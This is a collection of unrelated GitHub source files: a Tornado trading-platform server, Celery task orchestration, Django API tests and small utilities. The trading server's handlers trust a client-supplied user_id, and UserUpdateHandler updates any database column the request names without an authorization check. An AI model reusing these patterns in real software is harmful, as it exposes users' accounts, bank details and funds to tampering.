suns=suns)\n else:\n self.render('error.html', message='Unauthorized access')\n\n\nclass UserProfileHandler(BaseHandler):\n def get(self):\n pass\n\n def post(self):\n user_id = self.get_argument('user_id', None)\n if not user_id:\n self.render('error.html', message='参数缺失!')\n return\n\n try:\n user = self.session.query(User).filter(User.deleted==0,User.id==user_id).one_or_none()\n user_bank = self.session.query(UserBank.bank_no,UserBank.bank_account_name, UserBank.bank_province,UserBank.bank_city ,UserBank.bank_name,UserBank.bank_branch_name).filter(UserBank.deleted==0,UserBank.user_id==user_id).order_by(UserBank.is_default.desc()).all()\n except DBAPIError as e:\n logging.warning(e.args[0])\n self.render('error.html', message='Error to query user')\n else:\n if user:\n self.render('user/profile.html', user=user, banks=user_bank)\n else:\n self.render('error.html', message='Unauthorized access')\n\n\nclass UserUpdateHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id')\n col = self.get_argument('flag')\n value = self.get_argument('value')\n try:\n self.session.query(User).filter(User.id == user_id).update({col:value})\n self.session.commit()\n except DBAPIError as e:\n self.session.rollback()\n data = {'result':'error','msg':e.args[0]}\n self.write(json.JSONEncoder().encode(data))\n else:\n data = {'result': 'success', 'msg': 'okay'}\n self.write(json.JSONEncoder().encode(data))\n finally:\n self.session.close()\n\nclass UserWalletHandler(BaseHandler):\n def post(self):\n login_name = self.get_argument('username', None)\n user_id = self.get_argument('user_id', None)\n\n if not login_name or not user_id:\n self.render(\"error.html\", message=\"Bad Request\")\n return\n\n money_info = {}\n avaliable_money = UserHandler.get_available_money(user_id)\n in_using_money = UserHandler.get_in_using_money(user_id)\n can_used_money = round((avaliable_money-in_using_money), 2)\n frozen_money = UserHandler.get_frozen_money(user_id)\n money_info['am'] = avaliable_money\n money_info['cum'] = can_used_money\n money_info['fm'] = frozen_money\n\n total_assets = UserHandler.get_total_assets_amount(user_id)\n\n assets_info = UserHandler.get_assets(user_id)\n\n self.render(\"user/wallet.html\", total_assets=total_assets, money_info=money_info, assets_info=assets_info)\n\n\nclass UserOrdersHandler(BaseHandler):\n\n def post(self):\n login_name = self.get_argument('username', None)\n user_id = self.get_argument('user_id', None)\n\n if not login_name or not user_id:\n self.render(\"error.html\", message=\"参数缺失!\")\n return\n\n sub_info = Common.get_user_subscription(session=self.session, user_id=user_id)\n\n self.render(\"user/orders.html\", sub_info=sub_info)\n\nclass UserSubBuyHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n qty = self.get_argument('qty', None)\n price = self.get_argument('price', None)\n p_no = self.get_argument('p_no', None)\n\n if not user_id or not qty or not price or not p_no:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n total_assets = UserHandler.get_total_assets_amount(user_id)\n\n max_qty = 0.2 #g\n\n if operator.eq(total_assets, 0):\n max_qty = 0.2\n if operator.gt(float(qty), max_qty):\n data = {'result': 'error', 'msg': '新用户最多可认购:{}克!'.format(max_qty)}\n self.write(json.JSONEncoder().encode(data))\n return\n else:\n if total_assets >=10000:\n max_qty = 0.4\n elif total_assets >=1000:\n max_qty = 0.2\n else:\n max_qty = 0\n\n if operator.gt(float(qty), max_qty):\n data = {'result': 'error', 'msg': '您总持仓为:{}元,最多可认购:{}克!'.format(total_assets, max_qty)}\n self.write(json.JSONEncoder().encode(data))\n return\n\n\n try:\n order_sub = OrderSub()\n order_sub.user_id = user_id\n order_sub.p_no = 'CZQH'\n order_sub.qty = float(qty)*100\n order_sub.price = float(price)/100.00\n order_sub.amount = float(qty) * float(price)\n order_sub.status = OrderSub.StatusWaitForPaid\n order_sub.unit = 'h'\n order_sub.created_at = time.time()\n\n self.session.add(order_sub)\n self.session.commit()\n except DBAPIError as e:\n self.session.rollback()\n logging.warning(e.args[0])\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n\n data = {'result': 'error', 'msg': '未知错误,请联系平台处理'}\n self.write(json.JSONEncoder().encode(data))\n else:\n data = {'result': 'success', 'msg': order_sub.id}\n self.write(json.JSONEncoder().encode(data))\n finally:\n self.session.close()\n\nclass UserWithdrawHandler(BaseHandler):\n def get(self):\n user_id = self.get_argument('user_id', None)\n\n max_amount = UserHandler.get_can_withdraw_money(user_id)\n banks = UserHandler.get_banks(user_id)\n\n self.render('user/withdraw.html', max_amount=max_amount, banks=banks)\n\n def post(self):\n user_id = self.get_argument('user_id', None)\n bank_id = self.get_argument('bank_id', None)\n amount = self.get_argument('amount', None)\n\n if not user_id or not bank_id or not amount:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n maxValue = UserHandler.get_can_withdraw_money(user_id)\n if operator.gt(float(amount), float(maxValue)):\n data = {'result': 'error', 'msg': '提现金额不得大于:{}'.format(maxValue)}\n self.write(json.JSONEncoder().encode(data))\n return\n\n uw = UserWithdraw()\n uw.user_id = user_id\n uw.bank_id = bank_id\n uw.amount = amount\n uw.status = UserWithdraw.StatusPending\n\n self.session.add(uw)\n\n try:\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': '提现申请失败,请稍后尝试!'}\n else:\n data = {'result': 'success', 'msg': 'successfully!'}\n finally:\n self.session.close()\n\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserWithdrawHistoryHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n records = UserHandler.get_withdraw_history(user_id)\n self.render('user/withdraw-history.html', histories=records)\n\nclass UserDepositHistoryHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n records = UserHandler.get_deposit_history(user_id)\n\n self.render('user/deposit-history.html', histories=records)\n\nclass UserBuyHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n price = self.get_argument('price', None)\n qty = self.get_argument('qty', None)\n\n if not p_no or not user_id or not price or not qty:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n result,message = OrderHandler.insert_buy_order(user_id,p_no,qty,price)\n\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config','channels')['matching'],json.JSONEncoder().encode({'P_NO':p_no}))\n data = {'result': 'success', 'msg': '委托成功!'}\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserSaleHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n price = self.get_argument('price', None)\n qty = self.get_argument('qty', None)\n\n if not p_no or not user_id or not price or not qty:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n result,message = OrderHandler.insert_sale_order(user_id,p_no,qty,price)\n\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config','channels')['matching'], json.JSONEncoder().encode({'P_NO': p_no}))\n data = {'result': 'success', 'msg': '委托成功!'}\n\n self.write(json.JSONEncoder().encode(data))\n\nclass BankCreateHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n bank_no = self.get_argument('bank_no', None)\n bank_account_name = self.get_argument('bank_account_name', None)\n bank_province = self.get_argument('bank_province', None)\n bank_city = self.get_argument('bank_city', None)\n bank_name = self.get_argument('bank_name', None)\n bank_branch_name = self.get_argument('bank_branch_name', None)\n is_default = self.get_argument('is_default', 0)\n\n if not user_id or \\\n not bank_no or \\\n not bank_account_name or \\\n not bank_province or \\\n not bank_city or \\\n not bank_name or \\\n not bank_branch_name:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n ub = UserBank()\n ub.user_id = user_id\n ub.bank_no = bank_no\n ub.bank_account_name = bank_account_name\n ub.bank_province = bank_province\n ub.bank_city = bank_city\n ub.bank_name = bank_name\n ub.bank_branch_name = bank_branch_name\n ub.is_default = is_default\n\n try:\n self.session.add(ub)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'result': 'success', 'msg': 'successfully!'}\n finally:\n self.session.close()\n\n self.write(json.JSONEncoder().encode(data))\n\n\n\n\n\n\nclass EntryModule(tornado.web.UIModule):\n\n def render(self, entry):\n return self.render_string(\"modules/entry.html\", entry=entry)\n\n\nclass ProductListHandler(BaseHandler):\n\n def post(self):\n\n data = ProductHandler.get_app_products_list()\n\n self.render(\"product/list.html\", data=data)\n\nclass ProductDetailHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no',None)\n if not p_no:\n self.render('error.html', message='Product no is empty')\n\n segment = self.get_argument('segment', None)\n\n if not segment:\n info = ProductHandler.get_app_product_info(p_no)\n\n x_times = ProductHandler.get_transaction_times(p_no)\n d_price = []\n a_price = []\n d_volume = []\n\n data = OrderDealHandler.get_deal_data(p_no)\n\n for t, dp, ap, dv in data:\n #x_times.append(t)\n d_price.append(dp)\n a_price.append(ap)\n d_volume.append(dv)\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session, p_no) #Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session, p_no) #Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n\n kdata = Common.get_k_data(self.session,p_no)\n\n self.render('product/detail.html', info=info, x=x_times, dp=d_price,ap=a_price,dv=d_volume, bi=bIndex, sd5=sale_5, bd5=buy_5, kd=kdata)\n else:\n if operator.eq(segment,'general'):\n info = ProductHandler.get_app_product_info(p_no)\n\n self.render('product/detail-general.html', info=info)\n elif operator.eq(segment, 'chart-time'):\n x_times = []\n d_price = []\n a_price = []\n d_volume = []\n\n data = OrderDealHandler.get_deal_data(p_no)\n\n for t, dp, ap, dv in data:\n x_times.append(t)\n d_price.append(dp)\n a_price.append(ap)\n d_volume.append(dv)\n\n kdata = Common.get_k_data(self.session, p_no)\n\n data = {'xt':x_times,'dp':d_price,'ap':a_price,'dv':d_volume}\n\n self.write(json.JSONEncoder().encode(data))\n elif operator.eq(segment, 'chart-k'):\n kdata = Common.get_k_data(self.session, p_no)\n\n self.write(json.JSONEncoder().encode(kdata))\n elif operator.eq(segment, 'bs5'):\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session, p_no)\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session, p_no)\n\n self.render('product/detail-bs5.html', bi=bIndex, sd5=sale_5, bd5=buy_5)\n elif operator.eq(segment, 'info'):\n self.render('product/detail-info.html')\n\nclass ProductBuyHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n if not p_no or not user_id:\n self.render('error.html', message='Product no or user id is empty')\n\n pinfo = ProductHandler.get_app_product_info(p_no)#contain current_price\n can_used_money = UserHandler.get_can_used_money(user_id)\n current_price = ProductHandler.get_current_price(p_no)\n max_buy_volume = math.floor(float(can_used_money)/float(current_price))\n up_stop_price = ProductHandler.get_up_stop_price(p_no)\n down_stop_price = ProductHandler.get_down_stop_price(p_no)\n\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n #print(buy_5)\n #if buy_5 and len(buy_5)>0:\n # buy_5.reverse()\n\n\n self.render('product/buy.html', info=pinfo, cum=can_used_money,cp=current_price,mbv=max_buy_volume, usp=up_stop_price, dsp=down_stop_price,bi=bIndex, sd5=sale_5, bd5=buy_5)\n\nclass ProductSaleHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n if not p_no or not user_id:\n self.render('error.html', message='Product no or user id is empty')\n\n pinfo = ProductHandler.get_app_product_info(p_no)\n can_sold_product = UserHandler.get_can_sale_asset_volume(user_id, p_no)\n current_price = ProductHandler.get_current_price(p_no)\n up_stop_price = ProductHandler.get_up_stop_price(p_no)\n down_stop_price = ProductHandler.get_down_stop_price(p_no)\n\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n\n self.session.close()\n #if buy_5 and len(buy_5)>0:\n # buy_5.reverse()\n\n self.render('product/sale.html', info=pinfo, csp=can_sold_product, cp=current_price,\n usp=up_stop_price, dsp=down_stop_price, bi=bIndex, sd5=sale_5, bd5=buy_5)\n\n\nclass ProductOrderHandler(BaseHandler):\n def post(self):\n\n user_id = self.get_argument('user_id',None)\n if not user_id:\n self.render('error.html',message='参数错误!')\n return\n records = OrderHandler.get_my_delegates(user_id)\n self.render('product/order.html', os=records)\n\nclass ProductAssetsHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n self.render('error.html', message='参数错误!')\n return\n\n assets = UserHandler.get_assets(user_id)\n self.render('product/assets.html', assets=assets)\n\nclass OrderCancelHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n order_id = self.get_argument('oid', None)\n\n if not user_id or not order_id:\n self.render('error.html',message='参数错误!')\n return\n\n result, message, p_no = OrderHandler.do_cancel(user_id, order_id)\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config', 'channels')['matching'],\n json.JSONEncoder().encode({'P_NO': p_no}))\n data = {'result': 'success', 'msg': '撤销成功!'}\n\n self.write(json.JSONEncoder().encode(data))\n\nclass TransactionSocketHandler(tornado.websocket.WebSocketHandler):\n\n waiters = set()\n\n @property\n def redis(self):\n return self.application.redis\n\n def open(self):\n TransactionSocketHandler.waiters.add(self)\n\n def on_close(self):\n TransactionSocketHandler.waiters.remove(self)\n\n @classmethod\n def broadcast(cls, msg):\n logging.info('Sending message to %d waiters', len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(msg)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def send_response(self, response):\n try:\n self.write_message(response)\n except:\n logging.error('Error to send message:{}'.format(response), exc_info=True)\n\n def on_message(self, message):\n logging.info('Get message %r', message)\n\n #TODO process get messsage\n\n response = Command.process_websoket_command(message, self.redis)\n\n response_msg = response\n #TransactionSocketHandler.send_updates(response_msg)\n #response_msg = Command.process(tornado.escape.json_decode(message), self.application.redis)\n\n self.send_response(response_msg)\n\n\nclass TransactionProductsHandler(BaseHandler):\n\n def post(self):\n try:\n products = self.session.query(Product).all()\n except DBAPIError as e :\n self.session.rollback()\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n finally:\n self.session.close()\n\n result = []\n for product in products:\n result.append(product.as_dict())\n self.write(json.JSONEncoder().encode(result))\n return\n\n\ndef main():\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(ConfigParser.get('wx.web.server.config', 'port'))\n ioloop.IOLoop.current().start()\n\n\nif __name__ == '__main__':\n main()","repo_name":"woniucao520/Python_studying","sub_path":"2018/wxpm-server-new1225/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":47445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"33548571226","text":"from logging import getLogger\nfrom shutil import copytree\nfrom typing import Tuple\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom virtool.example import example_path\nfrom virtool.subtractions.files import create_subtraction_files\nfrom virtool.subtractions.utils import FILES\nfrom virtool.subtractions.db import finalize\nfrom virtool.types import App\nfrom virtool.uploads.models import Upload\n\nlogger = getLogger(__name__)\n\n\nasync def create_fake_fasta_upload(app: App, user_id: str) -> Tuple[int, str]:\n async with AsyncSession(app[\"pg\"]) as session:\n upload = Upload(name=\"test.fa.gz\", type=\"subtraction\", user=user_id)\n\n session.add(upload)\n await session.flush()\n\n upload_id = upload.id\n upload_name = upload.name\n\n await session.commit()\n\n return upload_id, upload_name\n\n\nasync def create_fake_finalized_subtraction(\n app: App, upload_id: int, upload_name: str, subtraction_id: str, user_id: str\n):\n db = app[\"db\"]\n pg = app[\"pg\"]\n\n document = await db.subtraction.insert_one(\n {\n \"_id\": subtraction_id,\n \"name\": \"subtraction_1\",\n \"nickname\": \"\",\n \"deleted\": False,\n \"ready\": True,\n \"file\": {\"id\": upload_id, \"name\": upload_name},\n \"user\": {\"id\": user_id},\n }\n )\n\n subtractions_path = (\n app[\"config\"].data_path\n / \"subtractions\"\n / subtraction_id.replace(\" \", \"_\").lower()\n )\n\n subtractions_example_path = example_path / \"subtractions\" / \"arabidopsis_thaliana\"\n\n copytree(subtractions_example_path, subtractions_path, dirs_exist_ok=True)\n\n await create_subtraction_files(pg, document[\"_id\"], FILES, subtractions_path)\n\n return await finalize(\n db,\n pg,\n subtraction_id,\n gc={\"a\": 0.25, \"t\": 0.25, \"g\": 0.25, \"c\": 0.25},\n count=100,\n )\n","repo_name":"ryanfang5/virtool","sub_path":"virtool/subtractions/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"21528690901","text":"from __future__ import annotations\nfrom typing import List\nimport time\nimport logging\nimport json\nimport os\nfrom enum import Enum\n\nfrom celery.result import AsyncResult\nfrom celery import signature\nfrom celery import group, chain, chord, signature\n\n\nfrom augur.tasks.github import *\nif os.environ.get('AUGUR_DOCKER_DEPLOY') != \"1\":\n from augur.tasks.data_analysis import *\nfrom augur.tasks.github.detect_move.tasks import detect_github_repo_move\nfrom augur.tasks.github.releases.tasks import collect_releases\nfrom augur.tasks.github.repo_info.tasks import collect_repo_info\nfrom augur.tasks.github.pull_requests.files_model.tasks import process_pull_request_files\nfrom augur.tasks.github.pull_requests.commits_model.tasks import process_pull_request_commits\nfrom augur.tasks.git.facade_tasks import *\nfrom augur.tasks.db.refresh_materialized_views import *\n# from augur.tasks.data_analysis import *\nfrom augur.tasks.init.celery_app import celery_app as celery\nfrom celery.result import allow_join_result\nfrom augur.application.logs import AugurLogger\nfrom augur.application.db.session import DatabaseSession\nfrom augur.tasks.init.celery_app import engine\nfrom augur.application.db.util import execute_session_query\nfrom logging import Logger\n\nCELERY_GROUP_TYPE = type(group())\nCELERY_CHAIN_TYPE = type(chain())\n\n#Predefine phases. For new phases edit this and the config to reflect.\n#The domain of tasks ran should be very explicit.\ndef prelim_phase(logger):\n\n tasks_with_repo_domain = []\n\n with DatabaseSession(logger) as session:\n query = session.query(Repo)\n repos = execute_session_query(query, 'all')\n\n for repo in repos:\n tasks_with_repo_domain.append(detect_github_repo_move.si(repo.repo_git))\n\n #preliminary_task_list = [detect_github_repo_move.si()]\n preliminary_tasks = group(*tasks_with_repo_domain)\n return preliminary_tasks\n\ndef repo_collect_phase(logger):\n #Here the term issues also includes prs. This list is a bunch of chains that run in parallel to process issue data.\n issue_dependent_tasks = []\n #repo_info should run in a group\n repo_info_tasks = []\n #A chain is needed for each repo.\n with DatabaseSession(logger) as session:\n query = session.query(Repo)\n repos = execute_session_query(query, 'all')\n #Just use list comprehension for simple group\n repo_info_tasks = [collect_repo_info.si(repo.repo_git) for repo in repos]\n\n for repo in repos:\n first_tasks_repo = group(collect_issues.si(repo.repo_git),collect_pull_requests.si(repo.repo_git))\n second_tasks_repo = group(collect_events.si(repo.repo_git),\n collect_github_messages.si(repo.repo_git),process_pull_request_files.si(repo.repo_git), process_pull_request_commits.si(repo.repo_git))\n\n repo_chain = chain(first_tasks_repo,second_tasks_repo)\n issue_dependent_tasks.append(repo_chain)\n\n repo_task_group = group(\n *repo_info_tasks,\n chain(group(*issue_dependent_tasks),process_contributors.si()),\n generate_facade_chain(logger),\n collect_releases.si()\n )\n \n return chain(repo_task_group, refresh_materialized_views.si())\n\n\nDEFINED_COLLECTION_PHASES = [prelim_phase, repo_collect_phase]\nif os.environ.get('AUGUR_DOCKER_DEPLOY') != \"1\":\n DEFINED_COLLECTION_PHASES.append(machine_learning_phase)\n\n\nclass AugurTaskRoutine:\n \"\"\"class to keep track of various groups of collection tasks as well as how they relate to one another.\n Accessible like a dict, each dict item represents a 'phase' of augur collection executed more or less in parallel.\n\n Attributes:\n logger (Logger): Get logger from AugurLogger\n jobs_dict (dict): Dict of data collection phases to run\n collection_phases (List[str]): List of phases to run in augur collection.\n \"\"\"\n def __init__(self,collection_phases: List[str]=[]):\n self.logger = AugurLogger(\"data_collection_jobs\").get_logger()\n #self.session = TaskSession(self.logger)\n self.jobs_dict = {}\n self.collection_phases = collection_phases\n #self.disabled_collection_tasks = disabled_collection_tasks\n\n #Assemble default phases\n #These will then be able to be overridden through the config.\n for phase in collection_phases:\n self.jobs_dict[phase.__name__] = phase\n\n #Get and set dict values that correspond to phases of collection\n def __getitem__(self,key: str) -> dict:\n \"\"\"Return the collection group with the specified key.\n \"\"\"\n return self.jobs_dict[key]\n \n def __setitem__(self,key: str,newJobs):\n \"\"\"Create a new collection job group with the name of the key specified.\n \"\"\"\n self.collection_phases.append(newJobs)\n self.jobs_dict[key] = newJobs\n\n def start_data_collection(self):\n \"\"\"Start all task items and return.\n \"\"\"\n self.logger.info(\"Starting augur collection\")\n\n self.logger.info(f\"Enabled phases: {list(self.jobs_dict.keys())}\")\n augur_collection_list = []\n for phaseName, job in self.jobs_dict.items():\n self.logger.info(f\"Starting phase {phaseName}\")\n #Call the function stored in the dict to return the object to call apply_async on\n\n try:\n tasks = job(self.logger)\n phaseResult = tasks.apply_async() \n\n # if the job is a group of tasks then join the group\n if isinstance(tasks, CELERY_GROUP_TYPE): \n with allow_join_result():\n phaseResult.join()\n\n except Exception as e:\n #Log full traceback if a phase fails.\n self.logger.error(\n ''.join(traceback.format_exception(None, e, e.__traceback__)))\n self.logger.error(\n f\"Phase {phaseName} has failed during augur collection. Error: {e}\")\n raise e\n\n\n #self.logger.info(f\"Result of {phaseName} phase: {phaseResult.status}\")\n\n\n@celery.task\ndef start_task():\n\n logger = logging.getLogger(start_task.__name__)\n\n #Get phase options from the config\n with DatabaseSession(logger) as session:\n config = session.config\n phase_options = config.get_section(\"Task_Routine\")\n\n #Get list of enabled phases \n enabled_phase_names = [name for name, phase in phase_options.items() if phase == 1]\n enabled_phases = [phase for phase in DEFINED_COLLECTION_PHASES if phase.__name__ in enabled_phase_names]\n\n #print(f\"disabled: {disabled_phases}\")\n augur_collection = AugurTaskRoutine(collection_phases=enabled_phases)\n\n augur_collection.start_data_collection()\n\n\n\n\n\n","repo_name":"cvaughn-anaconda/augur","sub_path":"augur/tasks/start_tasks.py","file_name":"start_tasks.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29702124087","text":"import keras.backend as K\nimport tensorflow as tf\n\n\n# Huber loss for DQN\ndef huber_loss(y_true, y_pred, clip_delta=1.0):\n error = y_true - y_pred\n cond = K.abs(error) <= clip_delta\n squared_loss = 0.5 * K.square(error)\n quadratic_loss = 0.5 * K.square(clip_delta) + clip_delta * (K.abs(error) - clip_delta)\n return K.mean(tf.where(cond, squared_loss, quadratic_loss))\n","repo_name":"doandongnguyen/FuzzyDQN","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"26635292743","text":"import pytest\nfrom django.contrib.auth.models import User\n\nfrom .data import *\n\n\n@pytest.mark.django_db\ndef test_register_user(client):\n payload = USER_1\n response = client.post(\"/api/users/\", payload)\n\n assert response.data['username'] == payload['username']\n assert response.status_code == 201\n assert User.objects.count() == 1\n assert 'password' in response.data\n\n\n@pytest.mark.django_db\ndef test_register_user_fail_data(client):\n payload = USER_FAIL # don't have password\n response = client.post(\"/api/users/\", payload)\n\n assert response.status_code == 400\n assert bool(response.data['password'])\n\n\n@pytest.mark.django_db\ndef test_login_user(client, user):\n response = client.post('/api/login/', USER_1)\n\n assert response.status_code == 302 # redirect to the wallets page\n assert response.url == '/api/wallets/'\n\n\n@pytest.mark.django_db\ndef test_login_user_fail_data(client):\n response = client.post('/api/login/', dict(\n username='testuserfail',\n password='test123'\n ))\n assert response.status_code == 200 # it's standard work of Django\n\n\n@pytest.mark.django_db\ndef test_get_list_users_auth_user(auth_user, admin):\n response = auth_user.get('/api/users/')\n\n assert response.status_code == 200\n assert len(response.data) == 1\n assert User.objects.count() == 2\n\n@pytest.mark.django_db\ndef test_get_list_users_admin(auth_admin, user):\n response = auth_admin.get('/api/users/')\n\n assert response.status_code == 200\n assert len(response.data) == 2\n assert User.objects.count() == 2\n\n\n@pytest.mark.django_db\ndef test_get_list_users_unauth_user(client):\n response = client.get('/api/users/')\n\n assert response.status_code == 200\n assert response.data == []\n\n\n@pytest.mark.django_db\ndef test_get_detail_user_auth_user(auth_user, admin):\n pk_user = auth_user.get('/api/users/').data[0]['id']\n response = auth_user.get(f'/api/users/{pk_user}/')\n\n assert response.status_code == 200\n assert User.objects.count() == 2\n assert response.data['username'] == USER_1['username']\n assert len(response.data) == 3\n\n\n@pytest.mark.django_db\ndef test_get_detail_other_user_auth_user(auth_user, admin):\n pk_admin = User.objects.get(username=ADMIN['username']).id\n response = auth_user.get(f'/api/users/{pk_admin}/')\n\n assert response.status_code == 403\n assert User.objects.count() == 2\n\n\n@pytest.mark.django_db\ndef test_get_detail_other_user_admin(auth_admin, user):\n pk_user = User.objects.get(username=USER_1['username']).id\n response = auth_admin.get(f'/api/users/{pk_user}/')\n\n assert response.status_code == 200\n assert User.objects.count() == 2\n assert response.data['username'] == USER_1['username']\n assert len(response.data) == 3\n\n\n@pytest.mark.django_db\ndef test_get_detail_user_unauth_user(client, user):\n pk = user.id\n response = client.get(f'/api/users/{pk}/')\n\n assert response.status_code == 401\n assert response.data['detail'] == 'Учетные данные не были предоставлены.'\n\n\n@pytest.mark.django_db\ndef test_logout_user(auth_user):\n response = auth_user.get('/api/logout/')\n\n assert response.status_code == 200\n # result = response.cookies\n","repo_name":"Vyvarka/wallet_test","sub_path":"tests/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9013143018","text":"from pprint import pprint\n\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n if character.isalpha():\n count.setdefault(character, 0)\n count[character] = count[character] + 1\n\n# create an array of tuples from the count dictionary\nitems = list(count.items())\n\n# sort by the count\nfoo = sorted(items, key=lambda c:c[1], reverse=True)\nprint(foo)\nprint('The most common letter is', foo[0][0].title(), 'which occured', foo[0][1], 'times.' )\n# print(type(items[0])) #tuple\npprint(count)","repo_name":"mrslwiseman/python","sub_path":"characterCount.py","file_name":"characterCount.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22710305761","text":"import weakref\nimport dbus\nimport dbus.service\n\nfrom common import ODict, Globals\nfrom log import logger\n\nclass DockManager(dbus.service.Object):\n def __new__(cls, dockbar):\n if \"net.launchpad.DockManager\" in dbus.SessionBus().list_names():\n logger.debug(\"Name net.launchpad.DockManager is already\" + \\\n \" in use. (This instance of) DockbarX will\" + \\\n \" not use DockManager.\")\n return None\n else:\n return dbus.service.Object.__new__(cls)\n\n def __init__(self, dockbar):\n self.dockbar_r = weakref.ref(dockbar)\n bus_name = dbus.service.BusName(\"net.launchpad.DockManager\",\n bus = dbus.SessionBus())\n dbus.service.Object.__init__(self, bus_name,\n \"/net/launchpad/DockManager\")\n self.globals = Globals()\n\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"\", out_signature=\"as\",)\n def GetCapabilities(self):\n capabilities = [\"menu-item-container-title\",\n \"menu-item-icon-file\",\n \"menu-item-icon-name\",\n \"menu-item-with-label\",\n \"dock-item-badge\",\n \"dock-item-progress\"]\n return capabilities\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"\", out_signature=\"ao\",)\n def GetItems(self):\n path_list = []\n for path in self.dockbar_r().get_dm_paths():\n path_list.append(dbus.ObjectPath(path))\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"s\", out_signature=\"ao\",)\n def GetItemsByDesktopFile(self, name):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_desktop_file(name):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by dekstop file: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"s\", out_signature=\"ao\",)\n def GetItemsByName(self, name):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_name(name):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by name: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"i\", out_signature=\"ao\",)\n def GetItemsByPid(self, pid):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_pid(pid):\n 